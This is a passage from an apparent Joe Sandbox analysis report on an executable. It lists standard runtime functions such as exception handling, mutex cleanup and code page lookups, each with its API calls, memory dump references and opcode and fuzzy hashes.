                      • Part of subcall function 0043B139: MultiByteToWideChar.KERNEL32(0043E7FD,00000100,E8458D00,00000000,00000000,00000020,?,0043F2AF,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0043B1A9
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00436E4A,00000000,?,00000000,?), ref: 004369AF
                    • __dosmaperr.LIBCMT ref: 004369B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                    • String ID: JnC
                    • API String ID: 4030486722-2531755783
                    • Opcode ID: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction ID: a10604e378203b479d6c6f5be248016944f26615d1a374979f6fa953727c9187
                    • Opcode Fuzzy Hash: 542da8e16dc8448421128fe7dc572524c7bf7eb1b3f266dbcc14f135b89de347
                    • Instruction Fuzzy Hash: 75210BB1500612BBCB206F278C01B1B77A9EF49370F12D21FF5699B290D778E8108BD9
                    Function 00431812 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431872
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 3390424672-2046700901
                    • Opcode ID: 582a63a74f590e99f896d5d57d10d118a2d1f6dead95b6f27a98c9f597e5b54f
                    • Instruction ID: 7964dc9a277d96143858123c881e5cd0313aeba4e8efcfbf37adde4059d6b578
                    • Opcode Fuzzy Hash: 582a63a74f590e99f896d5d57d10d118a2d1f6dead95b6f27a98c9f597e5b54f
                    • Instruction Fuzzy Hash: EE110636A00214ABCB19BF19C48596E7765AF4C365F14406BEC02A73A2DB7CDD05CBDD
                    Function 0041D4F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    • Opcode ID: 8e0d3a27dc6f9ee6324be1a1e4ea56dee360a7d060283af5dc5f599027f37d14
                    • Instruction ID: c76681e0b964bcace0b93bbe14680470d23c52cf74b0c73484cba7b613844c7a
                    • Opcode Fuzzy Hash: 8e0d3a27dc6f9ee6324be1a1e4ea56dee360a7d060283af5dc5f599027f37d14
                    • Instruction Fuzzy Hash: EE01C875C0030D77CB14AEA5EC0598A77AC9E04319F10862BBA14A6591FB78EA98C699
                    Function 0041D101 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D32A
                    • ___raise_securityfailure.LIBCMT ref: 0041D411
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: @WF
                    • API String ID: 3761405300-3852368868
                    • Opcode ID: 460afabb6922fb4f296bbee52beaac180ae284aceef47d3ebe08e74322d503a1
                    • Instruction ID: 75ee518bf79167b8f649b50e41bdf5ed7c56c8c6d5508b330e436f80bcac97d4
                    • Opcode Fuzzy Hash: 460afabb6922fb4f296bbee52beaac180ae284aceef47d3ebe08e74322d503a1
                    • Instruction Fuzzy Hash: D321DFB4510B00EAD720EF55EA856543BE4FB58314F50513AEA088BAB1F3F458A5CF8E
                    Function 004197D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock
                    • String ID: P#@$P#@
                    • API String ID: 1418687624-3974838576
                    • Opcode ID: c4ac876da92ca31e90b15d523be836fc0012c066dc5059b4bef913fc19992d03
                    • Instruction ID: d675d88b1282bf066b476e3553b00fe0255c5d2f2a02dd3f05bed3fb85d18cc6
                    • Opcode Fuzzy Hash: c4ac876da92ca31e90b15d523be836fc0012c066dc5059b4bef913fc19992d03
                    • Instruction Fuzzy Hash: 1E0128356003086BC714FF95D801E9B7B9D9F04719B00457FFA05B7642EFB8AA4487AD
                    Function 044FAA35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction ID: 56fa3789027995a5aecf10054e030550e23fafb08513044789175fa23ab53285
                    • Opcode Fuzzy Hash: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction Fuzzy Hash: FF018835E45E21FAFD3176B6AE04E6B1288DF42724B140327EF28B51E5E951F80A4296
                    Function 0043A7CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction ID: d85ed182e3a527026958e8772241ee3510a0413970d01727080480170c1ae8b7
                    • Opcode Fuzzy Hash: cc23bd9b2268c6a22532104eabe6c854e2f3420335cb4ec2c5d8ad75fd8a1ebc
                    • Instruction Fuzzy Hash: 00015231985A2176E52932365D46B6B12489B1D768F14222BFBB0A62E2FB5D8C2301DF
                    Function 044F3E79 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 044F3ED9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID: @E$@E
                    • API String ID: 3997070919-1681324763
                    • Opcode ID: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction ID: 4a6a5b1e3d2db2c94de492d042a1021d32cc26f03b61da241b2ed31d2cf8425a
                    • Opcode Fuzzy Hash: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction Fuzzy Hash: 87016235900209ABDB019F6CD984FAEBBB8FF48755F15419AEE05AB3A1D770E901CBD0
                    Function 00433C12 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID: @E$@E
                    • API String ID: 3997070919-1681324763
                    • Opcode ID: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction ID: ccb3f3f5f7c9ee04892ce8e489ef89d1f636ac3599413e13066f302f7a6b8dbe
                    • Opcode Fuzzy Hash: 4b1736622c6c0ab28670fa85c1aaa9d39fd1b9c29a08c09f8ba385b9835c4669
                    • Instruction Fuzzy Hash: 1E01A236900208AFD7019F5DD884BAEBBB8FF48701F15915AE904AB3A1D770EE01CF90
                    Function 00419B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                    Download Yara Rule
                    APIs
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00419B6B
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00419B74
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: {A
                    • API String ID: 1432671424-169627337
                    • Opcode ID: 1e5744975acad0febd2726890940471a240838eee3624bc293d6c265ef5c91b6
                    • Instruction ID: e068e03794c4fb8f333e278d6eb3df2bafc1dd7495d534287246863c21af4ae8
                    • Opcode Fuzzy Hash: 1e5744975acad0febd2726890940471a240838eee3624bc293d6c265ef5c91b6
                    • Instruction Fuzzy Hash: 05F04FB29047009BCA24DB61E459BDB73E8BF44304F04491EE69687A41D778F988C795
                    Function 00402440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 3109751735-3974838576
                    • Opcode ID: 92b96a2490baaecf7b1badda44f20d14ef1af3c9e2e21dd8a15b500e5daaabdc
                    • Instruction ID: 63b28b545846f2e16aeef958533034f84efa6074d6cfadea166291daee7e4e7d
                    • Opcode Fuzzy Hash: 92b96a2490baaecf7b1badda44f20d14ef1af3c9e2e21dd8a15b500e5daaabdc
                    • Instruction Fuzzy Hash: 6EF0A0B680020C67C714EEE5D801986B7ACDE19305F108A2BFB50A7501F7B4BA488799
                    Function 00403400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00402AF0: ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                      • Part of subcall function 00433C12: RaiseException.KERNEL32(E06D7363,00000001,00000003,@E,?,?,?,0045E440), ref: 00433C72
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040343E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy$ExceptionRaise
                    • String ID: P#@$P#@
                    • API String ID: 2103344913-3974838576
                    • Opcode ID: 044c6c93a0eada27c9aacc806972e27047ed6f520bcb21169c284d2a50876cae
                    • Instruction ID: 59601a4cc39f227afb39c20c06a9e1ce7c679964eee42f0a4464548f58adb70b
                    • Opcode Fuzzy Hash: 044c6c93a0eada27c9aacc806972e27047ed6f520bcb21169c284d2a50876cae
                    • Instruction Fuzzy Hash: A2F0EC76D1020C67C714EFD9DC01D87B7ACDE04305B10892BFA10B7502FBB4B54487A9
                    Function 00417C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00417C66
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00417C6F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: 4e413a3fa84508e26811ec96a5c5c29d0cbdfa0ef1a719351920035e4ed366a0
                    • Instruction ID: abed85cd935592136217e6f665b32487889cb1eb46ec7d36a7aebd99e62de6e6
                    • Opcode Fuzzy Hash: 4e413a3fa84508e26811ec96a5c5c29d0cbdfa0ef1a719351920035e4ed366a0
                    • Instruction Fuzzy Hash: 9CF0E970A4130957C7209B64CC45A86B7D89F01319B14862FF95887291E779E8848BD8
                    Function 0043E2FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • GetOEMCP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E327
                    • GetACP.KERNEL32(00000000,0043E56E,?,?,0043768E,0043768E,?), ref: 0043E33E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: nC
                    • API String ID: 0-511710893
                    • Opcode ID: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
                    • Instruction ID: 21ada401c65e344d19c9832113dec9a351789fdaec7677b80bc96e6f92cc92e3
                    • Opcode Fuzzy Hash: ae1174e1bc1fa5c5b9ea938702fdb7f5fe2436d67eb7aadae447a038ed29db40
                    • Instruction Fuzzy Hash: 42F0C230509200CBDB10EB65E85876D37B0AB04339F244355E835972E2D3B49845CB4A
                    Function 044DD488 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 044DD493
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 044DD4D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: WF
                    • API String ID: 3168844106-2907287748
                    • Opcode ID: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
                    • Instruction ID: 2dd65675b3980060ba96108ec9db94281b36c90d08ccfb177768e1e3ac462e0d
                    • Opcode Fuzzy Hash: 938bd01751543ab718da870d7ba12f255c1e676ee96af88044ad40f7be266536
                    • Instruction Fuzzy Hash: DDF02734A00A00DFCB209F18DD64A2677A8EB8673AF10033FEA55473D0E7343842CA16
                    Function 00402520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402552
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 2fa3110b15e4ed6c98d5a9cc667e066133f73a9b9ffec81c69659b02797e5efb
                    • Instruction ID: eb727e4c6e3963252b4e60716a57e365d02bcbec5f304e335dc0a3bb04f943e9
                    • Opcode Fuzzy Hash: 2fa3110b15e4ed6c98d5a9cc667e066133f73a9b9ffec81c69659b02797e5efb
                    • Instruction Fuzzy Hash: A1F08271D1020CABC714DF68D84198EBBF4AF59304F1082AFE844A7201EBB56A98CB99
                    Function 0042BA3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042BA5E
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042BA71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 548886458-2046700901
                    • Opcode ID: ebba513cb9f63eb931d06b0caf41921b684af7cd7b87baaac4c1ea1afcc669e4
                    • Instruction ID: 293f1ce4af30ee7a2289b2cafc5ba0a963c10326eaee9af88c8a7d0fff09a4de
                    • Opcode Fuzzy Hash: ebba513cb9f63eb931d06b0caf41921b684af7cd7b87baaac4c1ea1afcc669e4
                    • Instruction Fuzzy Hash: C9E0613EB4021467CB04B765E809C5DB77D9EC4714B10002BFA11A3362DF78DE44C5D8
                    Function 00402E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E50
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: 952c4a973a76709c9192fc1bc0ced5762ba26b9c2c78b9249b3edbe7acbbfe24
                    • Instruction ID: 46641368e6e60d11f9b06d4282c7db89a0e812e8be57c8d216f63cbc4c5833f8
                    • Opcode Fuzzy Hash: 952c4a973a76709c9192fc1bc0ced5762ba26b9c2c78b9249b3edbe7acbbfe24
                    • Instruction Fuzzy Hash: 0FE020B284130427C311AA909C0AEC77BCC8F11305F00482FFD5452242E7F9958447D8
                    Function 044E26C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044E266C
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 044E2682
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 044E2BB8
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 044E2BCC
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 044E2BED
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 044E2C56
                      • Part of subcall function 044E2BA9: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044E2DC4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
                    • String ID: @[F
                    • API String ID: 3302332639-1227568360
                    • Opcode ID: 153f3236cdbabbe7db1991ef0cf1f88b6a31994afc8e27e540a562292e0a9b1f
                    • Instruction ID: d29f8838d596b8ebed72195260df4abbbc2c0c67dead05adfcaa3386e5a64fb9
                    • Opcode Fuzzy Hash: 153f3236cdbabbe7db1991ef0cf1f88b6a31994afc8e27e540a562292e0a9b1f
                    • Instruction Fuzzy Hash: 3EE012B0B00601DBEF24AFA7D954735736CBB4470AF40056FD1448E241E7F5F8004749
                    Function 004235DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042360C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pScheduler$version
                    • API String ID: 2141394445-3154422776
                    • Opcode ID: 1b8a5219dacf47ec03d32c1aec8fefea155487b99710d83f1d7aad74c904c1a2
                    • Instruction ID: 5982c27aeec872d2574ee75d90a85c5a0ba858edd689f383aa7f969d4c346686
                    • Opcode Fuzzy Hash: 1b8a5219dacf47ec03d32c1aec8fefea155487b99710d83f1d7aad74c904c1a2
                    • Instruction Fuzzy Hash: 16E0483464021876CB25BE55D807BC97778972034AF508017B911211A29BFC57CCD989
                    Function 004024A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 004024BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 3730dae516e2db0038084a6e01249f6a9c5f8554e197c263b70ab42fed9b62c6
                    • Instruction ID: acdab43ea0f454e5b568466deb4dea61ad9a442cdd38150ed4eca4c6d96c7cd7
                    • Opcode Fuzzy Hash: 3730dae516e2db0038084a6e01249f6a9c5f8554e197c263b70ab42fed9b62c6
                    • Instruction Fuzzy Hash: 71D0C2B2910308A7C200DF98C800842BBDC9E19315700C52BF944E7201F3B0E8848BA8
                    Function 00402580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0040259E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@
                    • API String ID: 2659868963-3974838576
                    • Opcode ID: 3e913364fa5ea32c817d1b94c44d2086dc151819d2061fcb1bc8fdb026396fa3
                    • Instruction ID: 36b4a820664289b2779fabdb349dd3e31dd3f8a7d41fa5f4faa77770d1d2b202
                    • Opcode Fuzzy Hash: 3e913364fa5ea32c817d1b94c44d2086dc151819d2061fcb1bc8fdb026396fa3
                    • Instruction Fuzzy Hash: 41D02BB291030857C710DF98CC00842B7DCDE19315700C92BF944E7201F3B0E894CBE8
                    Function 00430CE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 00430CFA
                      • Part of subcall function 0042D9C0: Concurrency::details::ContextBase::~ContextBase.LIBCMT ref: 0042D9F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$BaseBase::~Concurrency::details::Internal
                    • String ID: B$B
                    • API String ID: 1065816584-1850355789
                    • Opcode ID: 5fc58df1e84948ee6e121ba395f9e2b525534bd4c2c1d5557bd544cbab0759a5
                    • Instruction ID: d343d55d842dc0c5f7550b210159b9d4af8cf7a514022aa9f7c69f9350428cd9
                    • Opcode Fuzzy Hash: 5fc58df1e84948ee6e121ba395f9e2b525534bd4c2c1d5557bd544cbab0759a5
                    • Instruction Fuzzy Hash: 0ED0A5B214431515C3141ED9750679577C84F06755F14C05FFD5857283DFF9548442DD
                    Function 00402E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00402E1D
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00402E26
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                    • String ID: @.@
                    • API String ID: 1432671424-4060093550
                    • Opcode ID: efb077dd9d90d760ce7937592e4120b290c0c6b94cc5addc2e5bc00b41a1a09e
                    • Instruction ID: d60a9d71acd9a2374f3681a4d886ad7491f8954107def6b53710e47b223ef30e
                    • Opcode Fuzzy Hash: efb077dd9d90d760ce7937592e4120b290c0c6b94cc5addc2e5bc00b41a1a09e
